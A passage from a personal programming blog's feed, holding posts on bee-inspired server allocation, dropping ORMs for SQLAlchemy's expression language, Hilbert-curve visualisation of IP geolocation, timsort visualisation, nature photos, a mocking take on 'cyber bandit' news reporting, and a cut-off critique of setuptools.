Notice that all the signals used in this system are "peer to peer" - bees only communicate with nearby bees that are in the hive at the moment of communication.</p> <p>The system described above is clear enough to implement easily, and there is a rich range of parallels with computer science. It's not surprising, therefore, that a bit of searching through the literature shows that a number of computer scientists have started mining the bee resource allocation algorithm for ideas. One nice example comes from Sunil Nakrani and <a rel="external" href="http://www2.isye.gatech.edu/~ctovey/">Craig Tovey</a>, who have successfully applied a subset of the behaviour outlined above in a paper called <a rel="external" href="http://www2.isye.gatech.edu/~ctovey/publications/papers/bee.oct19.2004.masi2.pdf">On Honey Bees and Dynamic Allocation in an Internet Server Colony</a>. Consider a hypothetical data center of servers used to implement a hosted application environment. Each application is backed by a dynamic pool of virtual servers, and servers can be added to or removed from the pools transparently. There is, however, a switching cost to moving resources about - re-allocating a virtual server involves server downtime and therefore lost revenue. Application load varies unpredictably - one day an application might be getting three hits a day, and the next it might crop up on Reddit and have a massive load spike. The hosting company is paid based on usage - say, per HTTP request served - and faces the complex problem of optimally allocating its server resources to minimize downtime and maximize revenue. Nakrani and Tovey approach this problem by mapping the bee resource allocation system onto the server allocation problem. In this mapping, foraging bees are the servers, and flower patches are the applications. In nature, the bee recruitment signal - the waggle dance described above - is triggered if a flower patch is sufficiently "profitable". 
The more profitable the nectar source, the greater the "vivacity and persistence" of the recruitment signal. Nakrani and Tovey simulated a system where servers used a central advertboard to post recruitment adverts. In broad terms, Nakrani and Tovey's servers were more likely to read a random advert from the advertboard, and switch to a different application, when their current application was less profitable. On the other hand, a server was more likely to post an advert to recruit more servers to its application, if its application was more profitable. The result is a distributed algorithm that performs within about 11.5% of an omniscient resource allocator with complete knowledge of all future HTTP requests.</p> <p>Interestingly, Nakrani and Tovey also had something to teach entomologists. They found that while the bee recruitment algorithm performed superbly when there was a lot of variability in application load, it was outperformed by much simpler algorithms when load was relatively static. Their simulation therefore seems to indicate that the bee recruitment algorithm is an adaptation to variability in nectar sources. While this blog post focuses on what computer scientists can learn from insects, the possibility that information might flow the other way is a fascinating one. When I first read about the loose specialisation in the beehive, with foragers handing over their load to processors, my immediate thought was that this described a tiered architecture. Now, there are a number of sound non-architectural reasons why a colony would want to have some bees specialise in foraging. Foragers tend to be the older bees in the colony, and this makes complete sense. Foraging is a hazardous activity, and bees have a limited lifespan. Sending out bees that are approaching the end of their lives anyway is good economics. Hölldobler and Wilson write that this specialisation</p> <blockquote> <p>... 
causes a problem for the honeybee colony: How can the rate of food collection, particularly of nectar, and the rate of food processing be kept in balance?</p> </blockquote> <p>The computer scientist in me suspects that there may be a different way to look at this aspect of bee behaviour. In computing we produce tiered architectures with independent layers because they <em>improve</em> efficiency and flexibility in various ways. I can't help but wonder if a similar benefit might support this aspect of bee behaviour.</p> <h2 id="postscript">Postscript</h2> <p>One last note before I'm done. Karl von Frisch once said that</p> <blockquote> <p>... the life of bees is like a magic well. The more you draw from it, the more there is to draw.</p> </blockquote> <p>There are some 20,000 species of bee in the world, ranging from solitary species to the great super-societies of domestic honeybees. There are 14,000 species of ants, 4,000 species of termite, and more than 100,000 species of wasp. Each of these species is a unique product of evolution's boundless ingenuity, and each has its own suite of solutions to the problems of survival. When one of these species disappears - and they are doing so at a terrifying rate - the tragedy is not simply that something beautiful is irretrievably gone from the world, but also that we have lost another irreplaceable magic well to study, learn from, and emulate. E. O. 
Wilson has devoted much of the latter years of his life to the great cause of preserving our biological legacy - if you are interested in this urgent issue (and you should be) I recommend his 2002 book <a rel="external" href="https://www.amazon.com/Future-Life-Edward-Wilson/dp/0679768114">The Future of Life</a>.</p> A Farewell to ORMs 2009-10-12T00:00:00+00:00 2009-10-12T00:00:00+00:00 https://corte.si/posts/code/farewell-to-orms/ <p>I've been using ORMs for years, starting with my own hand-hacked library back in the days before there were good ORMs for Python, and more recently settling into a comfortable reliance on <a rel="external" href="http://www.sqlalchemy.org/">SQLAlchemy</a>. Over time, though, my initially rosy feelings towards ORMs have begun to sour. I gradually realised I was spending a disproportionate amount of time trying to coax the ORM into doing my bidding - and when I succeeded, the results were often ugly, slow and needlessly opaque. Analysing the performance of some of the more complicated portions of my data access layer was often painful, and I spent cumulative hours poring over generated SQL, trying to figure out what the ORM was doing and why. Usually, improving performance involved side-stepping the ORM altogether. Recently, a particularly gnarly performance issue prompted me to ditch the ORM from a project altogether, with surprisingly pleasant results.</p> <h2 id="impedance-mismatch">Impedance mismatch</h2> <p>Ask any programmer why they use an ORM, and the answer is likely to be "impedance mismatch". This is a lovely phrase from a rhetorical point of view - hovering at the edge of meaning, but nicely avoiding asserting anything that can actually be quantified. The usual hand-wave is that impedance mismatch arises from the tension between table-oriented relational data, and object-oriented conceptual thinking. 
Your Bicycle class - a subclass, naturally, of Vehicle - might have to be reconstructed from data scattered across six different tables, and it's a distressing possibility that none of those tables might be called Bicycle, or indeed Vehicle. What we should aim for, the argument goes, is a programmer's Shangri-La where we can transparently persist and restore our objects and have the storage taken care of by some magical plumbing. Whether or not the magical plumbing is worthwhile depends largely on how often the abstraction breaks down. The ORM approach does so frequently. Yes, I can use an ORM and think at the object level in the common case, but whenever I need to do anything remotely complicated - optimising a query, say - I'm back in the land of tables and foreign keys. In the end, the structure of data is something fundamental that can't be simplified or abstracted away. The ORM doesn't resolve the impedance mismatch, it just postpones it.</p> <h2 id="a-lighter-abstraction">A lighter abstraction</h2> <p>So, if ORMs are at best a very partial solution to the ill-defined impedance mismatch problem, why do so many programmers swear by them? It's not that they're all fools, it's just that ORMs solve ANOTHER practical problem much more successfully. Most programmers who use ORMs do so simply to avoid re-writing endless nearly identical CRUD operations for every persistable object in their project. This isn't about any fundamental object-relational impedance mismatch - it's simply a problem of query generation. So, this brings me to my own difficult-to-quantify contribution to the miasma of fuzzy thinking that already surrounds this issue: <strong>90% of the benefit most people derive from ORMs can be gained more simply and more transparently through unashamedly table-oriented query generation</strong>. All we need is a nice programmatic way to generate and manipulate SQL statements... 
Luckily we have just such a tool in the <a rel="external" href="http://www.sqlalchemy.org/docs/05/sqlexpression.html">SQLAlchemy SQL expression language</a> - a good, simple and nearly complete language for working with SQL expressions from Python.</p> <p>Pursuing this line of thought, I've ditched the ORM from a few of my projects. Instead, I'm using a defter abstraction - a simple, lightweight framework that uses SQLAlchemy's SQL expression language to auto-generate most queries. This framework is unashamedly table-oriented, and exists to manipulate data at a relational level. It clocks in at less than 150 lines of code. The database schema is no longer defined by the ORM - instead, helper objects are built through schema reflection. The result has been satisfying - my data layers are better encapsulated, database interaction is more transparent, and the conceptual complexity is much reduced. Since nothing happens magically behind the scenes, it's easier to analyse performance, and since there is no session layer (few projects really need one) a whole chunk of complexity has gone away. Using reflection rather than defining the schema in code has made schema evolution much less of a chore. I also retain other benefits usually attributed to ORMs - the expression language abstracts away flavour differences between databases, so I can still, for example, run a large fraction of my unit tests against in-memory SQLite databases and deploy on PostgreSQL. I'm now gradually migrating all my projects to this way of working.</p> Leopard Seal at Sandfly Bay 2009-09-09T00:00:00+00:00 2009-09-09T00:00:00+00:00 https://corte.si/posts/photos/leopardseal/ <div class="media"> <a href="leopardseal.jpg"> <img src="leopardseal-small.jpg" /> </a> <div class="subtitle"> Leopard Seal at Sandfly Bay </div> </div> <p>Took this shot on my morning walk, 15 minutes away from my home. We are usually the only humans on this 1km beach, and we are often out-numbered 10-1 by sea lions. 
The photo is of a <a rel="external" href="http://en.wikipedia.org/wiki/Leopard_Seal">leopard seal</a> - a rarity in these parts. These sleek top-predators bear as much resemblance to the portly and <a rel="external" href="http://www.flickr.com/photos/8268815@N08/3886175958/">rather ridiculous</a> sea lions as a labradoodle does to a wolf. This one was a juvenile - only about 2.5 meters long - but still managed to exude a considerable amount of toothy menace.</p> Visualising IP Geolocation 2009-09-05T00:00:00+00:00 2009-09-05T00:00:00+00:00 https://corte.si/posts/code/hilbert/explorer/ <style> .jpexample img { background: url(/geohilbert/ALL.png); } </style> <div class="media jpexample"> <a href="&#x2F;geohilbert&#x2F;JP.png"> <img src="&#x2F;geohilbert&#x2F;JP.png" /> </a> <div class="subtitle"> IP Addresses in Japan </div> </div> <p>I'm spending a fair bit of my time working on a project that uses an IP geolocation database to map internet addresses to countries as part of a security survey. There are a number of these location databases available, but comparing their quality and coverage is not trivial, so selecting one to use is hard. I recently decided to spend a few hours looking at the problem, and got hopelessly side-tracked into visualising the databases using the Hilbert curve. The result is the <a href="/geohilbert/index.html">Hilbert Explorer</a>, a mapping of the geographical location of IP addresses onto the Hilbert Curve. You should have a play with it before reading the rest of this post.</p> <h2 id="the-hilbert-curve-a-very-brief-introduction">The Hilbert Curve - a (very) brief introduction</h2> <p>The <a href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert Curve</a> is a space-filling <a href="http://mathworld.wolfram.com/Curve.html">curve</a> that is usually produced iteratively, with the N-th step in the iteration referred to as the "order N" curve. 
Here are orders 1 to 5:</p> <table class="spacertable"> <tr> <td><img src="h1.png"/><br>N=1</td> <td><img src="h2.png"/><br>N=2</td> <td><img src="h3.png"/><br>N=3</td> <td><img src="h4.png"/><br>N=4</td> <td><img src="h5.png"/><br>N=5</td> </tr> </table> <p>To translate from one order to the next, we simply replace U-shapes like the N=1 diagram with Y-shapes like the N=2 diagram. So, in the N=1 diagram there is a single U to be replaced, in the N=2 diagram there are 4 U-shapes (two at the top, oriented left and right, and two at the bottom oriented down). Each subsequent order has 4 times the number of U shapes the previous one had, so for N=3 we have 16 replacements to do, and so on and so forth.</p> <p>Mathematicians are interested in the behaviour of the limit curve as N approaches infinity - luckily the properties of the curve that are interesting to computer scientists manifest well short of that. For the purposes of this post, we can view the order-N curve simply as a way to lay out a sequence of 2**(2N) items on a plane, with the rather interesting property that items that are near each other in the sequence are also near each other on the plane:</p> <div class="media"> <a href="coordinates.png"> <img src="coordinates.png" /> </a> </div> <p>The recursive construction above is a nice way to explain the curve, but doesn't lead to an efficient way to actually draw it. For this I turned to Henry S. Warren's wonderful <a rel="external" href="http://www.amazon.com/exec/obidos/ASIN/0201914654/qid%3D1033395248/sr%3D11-1/ref%3Dsr_11_1/104-7035682-9311161">Hacker's Delight</a>, one of those books that I return to again and again. If you don't already own a copy, just buy it - you won't be disappointed. 
All the images in this post and in the Explorer were drawn with PyCairo using the algorithm for calculating co-ordinates from the distance along the curve given in section 14.4 of this book.</p> <h2 id="visualising-ip-geolocation">Visualising IP Geolocation</h2> <p>Mapping IP addresses to countries is a tricky affair. Control of any given address filters down from IANA to the regional registries, from regional registries to national and local registries, and from there to a myriad of private and government organisations. Here, horse-trading and private enterprise take over and IP blocks are sold, traded and routed arbitrarily, with the consequence that any given IP might actually be located in a geographical area totally unrelated to the controlling organization or even the registry region. A number of companies now offer geolocation databases at various prices, some of them for free. The databases themselves typically contain more than 100,000 subnets, usually spanning something like two billion actual addresses. I had about half a dozen of these databases to compare, and, being a visual creature, I wanted to <strong>see</strong> what I was dealing with. I've been fascinated with the Hilbert curve for a long time, but I first came across the idea of using it to visualise the entire IPv4 address space in Randall Munroe's excellent <a href="http://xkcd.com/195/">hand-drawn map of the Internet</a>. After this was published in 2006 a slew of more detailed visualisations appeared, including at least <a href="http://www.isi.edu/ant/address/whole_internet/index.html">one on a 1:1 scale</a>.</p> <p>We can map X points of data onto a discrete Hilbert curve of order lb(X)/2 (where lb is the base-2 logarithm), so the order 16 Hilbert curve would suffice to display all 2**32 IP addresses at a one-to-one scale. To produce a more manageable image size, I used an order 9 Hilbert curve producing a 512x512 pixel image, where each pixel represents a bucket of 16384 addresses. 
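</p> <p>The arithmetic above, and the mapping from an address to a pixel, can be sketched in Python roughly as follows. The conversion routine is the widely published iterative distance-to-coordinate algorithm, used here as a stand-in: it is not necessarily the Hacker's Delight routine used for the images in this post, its orientation may differ from theirs, and the function names are made up for illustration.</p>

```python
import ipaddress

ORDER = 9                          # order of the Hilbert curve
SIDE = 2 ** ORDER                  # 512 pixels per side
BUCKET = 2 ** 32 // (SIDE * SIDE)  # IPv4 addresses per pixel


def d2xy(side, d):
    """Convert distance d along the curve to (x, y) on a side x side grid."""
    x = y = 0
    t = d
    s = 1
    while side > s:
        rx = (t // 2) % 2
        ry = (t ^ rx) % 2
        if ry == 0:
            # Rotate (and flip if needed) the part of the curve built so far.
            if rx == 1:
                x, y = s - 1 - x, s - 1 - y
            x, y = y, x
        x += s * rx
        y += s * ry
        t //= 4
        s *= 2
    return x, y


def ip_to_pixel(address):
    """Map a dotted-quad IPv4 address to its pixel (hypothetical helper)."""
    return d2xy(SIDE, int(ipaddress.ip_address(address)) // BUCKET)


print(BUCKET)                   # addresses represented by one pixel
print(ip_to_pixel("10.0.0.0"))  # pixel holding the start of 10.0.0.0/8
```

<p>Since consecutive buckets always land on adjacent pixels, a contiguous block of addresses stays contiguous in the image.</p> <p>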
I then rendered a series of transparent PNG layers - one showing all addresses in the database, and a set of overlays showing the addresses in each country and some "landmarks" like the <a href="http://tools.ietf.org/html/rfc1918">RFC1918</a> addresses. The result looks something like the image at the head of this post. To make the visualisation more interactive, I bolted things together with a bit of Javascript to let me easily switch between countries, and to show IP addresses when hovering over the image. You can find the resulting visualisation for one of the freely-available geolocation databases - <a href="http://www.wipmania.com/en/base/">WorldIP</a> - here:</p> <h2 id="hilbert-explorer"><a href="/geohilbert/index.html">Hilbert Explorer</a></h2> <p>I'll stop there for now, and leave the actual database comparison and a deeper exploration of the related issues for future posts.</p> Seashells from Murdering Beach 2009-08-28T00:00:00+00:00 2009-08-28T00:00:00+00:00 https://corte.si/posts/photos/murderingshells/ <style> .shells td { border-bottom: 0; } </style> <table class="shells"> <tr> <td><a href="http://www.flickr.com/photos/8268815@N08/3863253255/" title="051shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2598/3863253255_b6a88458a6_t.jpg" width="100" height="100" alt="051shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863255667/" title="052shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2477/3863255667_9de928b4d2_t.jpg" width="100" height="100" alt="052shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863256917/" title="056shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2626/3863256917_9da498eb94_t.jpg" width="100" height="100" alt="056shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864040990/" title="057shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2601/3864040990_b6465402e8_t.jpg" 
width="100" height="100" alt="057shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864042394/" title="059shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2662/3864042394_fd9a3e2f14_t.jpg" width="100" height="100" alt="059shells" /></a></td> </tr> <tr> <td><a href="http://www.flickr.com/photos/8268815@N08/3864043258/" title="060shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2557/3864043258_2187b97b8c_t.jpg" width="100" height="100" alt="060shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863260683/" title="061shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2553/3863260683_6cc9662275_t.jpg" width="100" height="100" alt="061shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864044842/" title="062shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3181/3864044842_83ed99b591_t.jpg" width="100" height="100" alt="062shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863262185/" title="064shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3454/3863262185_c93aff80f1_t.jpg" width="100" height="100" alt="064shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863263741/" title="065shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2596/3863263741_1de40df77a_t.jpg" width="100" height="100" alt="065shells" /></a></td> </tr> <tr> <td><a href="http://www.flickr.com/photos/8268815@N08/3863264743/" title="066shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2531/3863264743_e51a081754_t.jpg" width="100" height="100" alt="066shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863265971/" title="067shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2584/3863265971_a540e4cd74_t.jpg" width="100" height="100" alt="067shells" /></a></td> <td><a 
href="http://www.flickr.com/photos/8268815@N08/3863267413/" title="068shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3513/3863267413_efda95bd09_t.jpg" width="100" height="100" alt="068shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863268603/" title="069shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2461/3863268603_49c216a076_t.jpg" width="100" height="100" alt="069shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863270349/" title="070shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2565/3863270349_2df1a30663_t.jpg" width="100" height="100" alt="070shells" /></a></td> </tr> <tr> <td><a href="http://www.flickr.com/photos/8268815@N08/3863271463/" title="071shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2633/3863271463_b8bb6c9416_t.jpg" width="100" height="100" alt="071shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864056086/" title="072shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2449/3864056086_9bd2441496_t.jpg" width="100" height="100" alt="072shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863273851/" title="073shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2598/3863273851_e36366e0aa_t.jpg" width="100" height="100" alt="073shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863275055/" title="074shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3547/3863275055_0b078205e7_t.jpg" width="100" height="100" alt="074shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3863276473/" title="075shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3438/3863276473_918bc411d0_t.jpg" width="100" height="100" alt="075shells" /></a></td> </tr> <tr> <td><a href="http://www.flickr.com/photos/8268815@N08/3864061252/" title="076shells by cortesi, on 
Flickr"><img src="http://farm3.static.flickr.com/2552/3864061252_48d169eac2_t.jpg" width="100" height="100" alt="076shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864062554/" title="077shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3226/3864062554_3b2ac66bcf_t.jpg" width="100" height="100" alt="077shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864063810/" title="078shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2459/3864063810_5cf4bcfb9a_t.jpg" width="100" height="100" alt="078shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864064924/" title="079shells by cortesi, on Flickr"><img src="http://farm4.static.flickr.com/3511/3864064924_bcb95a8ea2_t.jpg" width="100" height="100" alt="079shells" /></a></td> <td><a href="http://www.flickr.com/photos/8268815@N08/3864065752/" title="080shells by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2519/3864065752_44baaafcef_t.jpg" width="100" height="100" alt="080shells" /></a></td> </tr> </table> <p>Spent the morning collecting and taking photos of tiny seashells on Murdering Beach - a secluded local spot with a grisly past. The shells are all about the same size - a centimeter or so across - and seem to be from the same species of marine mollusc. The variety of patterns and colours is endless and fascinating - my inexpertly lit photographs don't do them justice.</p> Sorting Algorithm Visualisation Tidbits 2009-08-11T00:00:00+00:00 2009-08-11T00:00:00+00:00 https://corte.si/posts/code/sortingquickies/ <ul> <li>Jacob Seidelin has created an awesome port of the sorting algorithm visualisations I came up with in 2007 to Javascript, using the canvas element to do the drawing. 
<a href="http://blog.nihilogic.dk/2009/04/canvas-visualizations-of-sorting.html">Well worth checking out</a>.</li> <li>Another blogger (I'd love to be more specific, but the blog seems to be anonymous) was spurred by my post to wonder what sorting algorithms <em>sound</em> like. The fascinating result is <a href="http://www.pillowsopher.com/blog/?cat=4">over here</a>. Bubblesort turns out to be quite musical - who knew?</li> <li>Finally, timsort, which I drew <a href="https://corte.si/posts/code/timsort/">pictures of in my last post</a>, has <a href="http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6804124">replaced mergesort in Java.</a></li> </ul> Visualising Sorting Algorithms: Python's timsort 2009-08-08T00:00:00+00:00 2009-08-08T00:00:00+00:00 https://corte.si/posts/code/timsort/ <p><strong>Update</strong> See <a rel="external" href="http://sortvis.org">sortvis.org</a> for many more visualisations!</p> <p>A couple of years ago, I blogged about a technique I came up with for <a href="https://corte.si/posts/code/visualisingsorting/">statically visualising sorting algorithms</a> during a somewhat Scotch-fueled night of idle hacking. A recent day of poking at the Python codebase gave me an excuse to revisit the post and brush off the bit of code that underpins it. I've wanted to take a closer look at timsort - Tim Peters' wonderful sorting implementation for Python - for a while now. In the previous post I made a big deal about the fact that many attributes of sorting algorithms are easier to see in my static visualisations than in traditional animated equivalents. So, I thought it would be fun to see if one could get to grips with a real-world algorithm like timsort by visualising it. 
The fruit of my labour can be found below - if this kind of thing turns your crank, read on.</p> <p>Before you go on, you might first want to take a look at the <a href="https://corte.si/posts/code/visualisingsorting/">original post</a> for an explanation of how the diagrams are constructed and some related caveats.</p> <h2 id="inspecting-timsort">Inspecting timsort</h2> <p>The first step was to get hold of the progressive sorting data I needed for the visualisation. The way timsort is implemented has two properties that helped here - firstly, it's largely in-place, and secondly, when interrupted by an exception in the __cmp__ method of one of the elements it is sorting, it leaves the array partially sorted. The pleasant result is that I could get all the data I needed in pure Python, without instrumenting the interpreter source. A link to the code is at the bottom of this post.</p> <h2 id="a-first-guess-at-the-algorithm">A first guess at the algorithm</h2> <p>The first thing I did was to see if I could get a feel for timsort straight from the visualisation, without looking at the implementation (yes, I'm cheating slightly, since I already had an idea of what I would see). Here's timsort sorting a shuffled array of 64 elements:</p> <div class="media"> <a href="64r-tim.png"> <img src="64r-tim.png" /> </a> <div class="subtitle"> timsort - 64 elements </div> </div> <p>It's immediately clear that timsort has divided the data up into two blocks of 32 elements. The blocks are pre-sorted in turn (the first two "triangles" of activity, reading from left to right), before being merged together in the final step (the cross-hatch pattern at the right of the diagram). Looking closer, it's even possible to tell that the pre-sorting seems to be using insertion sort - compare the distinctive triangular pattern here with the insertion sort visualisation in the <a href="https://corte.si/posts/code/visualisingsorting/">previous post</a>. 
We can confirm this by taking the same data, and running it through an insertion sort visualisation. Here's the first block of 32 elements sorted by insertion sort:</p> <div class="media"> <a href="half.png"> <img src="half.png" /> </a> <div class="subtitle"> Insertion sort </div> </div> <p>As you can see, this sorting sequence is identical to the one in the upper-left part of the timsort diagram. A similar bit of hackery would show that the final merge is done with mergesort. Ok, so at this point, we can take a stab at a broad outline of the timsort algorithm: break the data up into blocks, pre-sort those blocks using insertion sort, and then merge the blocks together using mergesort.</p> <p>This is pretty good going for a quick inspection of a single diagram.</p> <h2 id="what-s-actually-happening">What's actually happening</h2> <p>Flicking to the <a href="http://bugs.python.org/file4451/timsort.txt">cheat sheet</a>, we can see that this guess is almost right. The business-end of timsort is a mergesort that operates on runs of pre-sorted elements. A minimum run length <strong>minrun</strong> is chosen to make sure the final merges are as balanced as possible - for 64 elements, <strong>minrun</strong> happens to be 32. Before the merges begin, a single pass is made through the data to detect pre-existing runs of sorted elements. Descending runs are handled by simply reversing them in place. If the resultant run length is less than <strong>minrun</strong>, it is boosted to <strong>minrun</strong> using insertion sort. 
On a shuffled array with no significant pre-existing runs, this process looks exactly like our guess above: pre-sorting blocks of <strong>minrun</strong> elements using insertion sort, before merging with merge sort.</p> <p>We can see a bit more detail by giving timsort the type of data it excels at - a partially sorted array:</p> <div class="media"> <a href="combo.png"> <img src="combo-annotated.png" /> </a> <div class="subtitle"> timsort - 64 elements </div> </div> <p>Now, looking at the marked progression from left to right:</p> <ul> <li><strong>1)</strong> timsort finds a descending run, and reverses the run in-place. This is done directly on the array of pointers, so seems "instant" from our vantage point.</li> <li><strong>2)</strong> The run is now boosted to length <strong>minrun</strong> using insertion sort.</li> <li><strong>3)</strong> No run is detected at the beginning of the next block, and insertion sort is used to sort the entire block. Note that the sorted elements at the bottom of this block are not treated specially - timsort doesn't detect runs that start in the middle of blocks being boosted to <strong>minrun</strong>.</li> <li><strong>4)</strong> Finally, mergesort is used to merge the runs.</li> </ul> <p>Of course, there's a lot that's not covered here: merge order, stability, the secondary memory requirements of the algorithm, and so forth. Maybe I'll get to some of these in a follow-up post. That said, I think this is still quite a reasonable high-level pictorial guide to timsort.</p> <p>I relied heavily on <a href="http://bugs.python.org/file4451/timsort.txt">Uncle Tim's own description of the algorithm</a> in writing this post - if you're interested in timsort, this document is definitely mandatory reading.</p> <h2 id="the-code">The Code</h2> <p>I've brushed up the code I included in my previous post and put it on <a href="http://github.com/cortesi/sortvis/tree/master">github</a>. 
You can check it out like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">git</span><span style="color: #032F62;"> clone git://github.com/cortesi/sortvis.git</span></span></code></pre> Buller's Albatross 2009-07-12T00:00:00+00:00 2009-07-12T00:00:00+00:00 https://corte.si/posts/photos/bullers/ <p>An encounter with a magnificent bird today - Buller's Albatross. It glided in to the side of the boat we were in to check if we had any fish, but took off disappointed when it turned out we did not:</p> <center> <a href="http://www.flickr.com/photos/8268815@N08/3715192684/" title="Buller's Albatross by cortesi, on Flickr"><img src="http://farm3.static.flickr.com/2610/3715192684_fae89809e5.jpg" width="500" height="189" alt="Buller's Albatross" /></a> </center> How to become a cyber bandit 2008-06-03T00:00:00+00:00 2008-06-03T00:00:00+00:00 https://corte.si/posts/security/badreporting/ <p>I came across a hilariously inept bit of tech reporting today, courtesy of the Sydney Morning Herald. Apparently the Wikipedia page for Mick Keelty, Australia's Federal Police Commissioner, was vandalised last week. Hardly earth-shattering, right? Just revert the changes, and move on. To a sensation-hungry hack without the faintest clue what Wikipedia is, however, this looks like a Story. More particularly, it looks like a story entitled "<a href="http://www.smh.com.au/news/technology/cyber-bandit-sabotages-top-cop/2008/05/31/1212258621186.html">Cyber bandit sabotages top cop</a>".</p> <p>The article gives a minutely detailed rundown of the rather juvenile vandalism (apparently perpetrated by a not very imaginative 13-year-old), and is accompanied by a stock photo showing a depressed-looking Keelty, evidently meditating on the deep unfairness of it all. The Wikipedia vandal is not just a "cyber bandit" - he is also referred to as a "hacker" throughout. 
The icing on the cake, however, is what has to be a mis-quote from <a href="http://en.wikipedia.org/wiki/Angela_Beesley">Angela Beesley</a>:</p> <blockquote> <p>Wikimedia Foundation Advisory Board chairwoman Angela Beesley said the person who made the edits infiltrated the site from outside.</p> </blockquote> <p>Infiltrated Wikipedia from the outside? You don't say.</p> setuptools sucks 2007-06-18T00:00:00+00:00 2007-06-18T00:00:00+00:00 https://corte.si/posts/code/setuptoolssucks/ <p>One of the epic conflicts of our time is being waged between two software design philosophies (bear with me here). Those who follow <strong>Design Philosophy A</strong> trust their users. Software is designed to be transparent and easy to inspect. Users are provided with simple and direct ways to control behaviour, and their choices are respected. Software developers avoid guessing the user's intent, since users can be trusted to do the sensible thing themselves. Those who follow <strong>Design Philosophy B</strong> think their users are idiots. Software is therefore opaque and difficult to inspect, because users wouldn't understand what is going on, and should be prevented from even trying. The developer's guess is always more trustworthy than the user's command. Users are robbed of options, because if we give the user too much control, they'll just fuck things up.</p> <p>Philosophy A has given you the open source movement, Unix and the Internet. Philosophy B has given you the Microsoft Paperclip, DRM and an endless stream of clueless MCSEs. Philosophy A stands for open standards, free information exchange, and user control. Philosophy B restricts how you can use information stored on your own computer, violates your privacy, and puts the interests of software makers ahead of that of the user. In corner A stands Richard Stallman, Linus Torvalds and Theo de Raadt, dressed in light and armed with flaming swords. 
In corner B, wreathed in shadow, stands Bill Gates, a cohort of ignorant greedy politicians and a dark army of patent lawyers.</p> <p>It is against this epic background that I invite you to consider another player on the side of darkness: <a href="http://peak.telecommunity.com/DevCenter/setuptools">setuptools</a>. No, I don't think <a href="http://dirtsimple.org/">Phillip J. Eby</a> is out to take control of your computer and leech your bank account details (though you might well prefer this to his attempts to <a href="http://dirtsimple.org/2007/02/how-not-to-be-loser.html">de-activate your loser circuit</a>). I surely do believe, though, that he thinks you are an idiot. Because setuptools, again and again, makes some decidedly Philosophy B design decisions. Witness:</p> <ul> <li>Setuptools is nosy. It deduces things magically from the version control system you use, so when you enter the Brave New World of <a href="http://git.or.cz/">distributed versioning</a>, all your build and distribution scripts silently malfunction.</li> <li>Setuptools is needlessly opaque. <a href="http://peak.telecommunity.com/DevCenter/PythonEggs">Eggs</a> break simple transparencies we currently take for granted - for example, we lose the ability to trivially inspect installed libraries with a pager, or to easily list the contents of an installed module. They also complicate more subtle things - because eggs are compressed, project data file access becomes a pain. If you need direct file access, you need to use even MORE setuptools magic to unpack project data files to a temporary directory.</li> <li>Setuptools is obstinate. It will automatically insert .eggs at the head of your sys.path to make sure they get imported in preference to any existing libraries. If I insert something into sys.path (say, for instance, to run a test suite against the development version of my library), I do NOT want my distribution mechanism to over-ride me. 
